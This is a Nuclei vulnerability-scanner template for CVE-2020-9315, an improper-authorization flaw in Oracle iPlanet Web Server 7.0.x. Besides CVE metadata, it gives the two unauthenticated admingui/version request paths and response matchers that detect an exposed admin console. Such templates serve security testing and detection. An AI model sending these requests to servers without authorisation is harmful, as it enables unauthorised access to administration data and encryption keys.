nuclei-templates/cves/2020/CVE-2020-9315.yaml

38 lines
1.2 KiB
YAML

id: CVE-2020-9315
info:
name: Oracle iPlanet Improper Authorization
author: dhiyaneshDk
severity: high
description: '** PRODUCT NOT SUPPORTED WHEN ASSIGNED ** Oracle iPlanet Web Server 7.0.x has Incorrect Access Control for admingui/version URIs in the Administration console, as demonstrated by unauthenticated read
access to encryption keys. NOTE: a related support policy can be found in the www.oracle.com references attached to this CVE.'
reference:
- https://www.cvebase.com/cve/2020/9315
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2020-9315
cwe-id: CWE-306
tags: cve,cve2020,oracle
requests:
- method: GET
path:
- "{{BaseURL}}/admingui/version/serverTasksGeneral?serverTasksGeneral.GeneralWebserverTabs.TabHref=2"
- "{{BaseURL}}/admingui/version/serverConfigurationsGeneral?serverConfigurationsGeneral.GeneralWebserverTabs.TabHref=4"
matchers-condition: and
matchers:
- type: word
words:
- "Admin Console"
- type: word
words:
- "serverConfigurationsGeneral"
- "serverCertificatesGeneral"
condition: or
- type: status
status:
- 200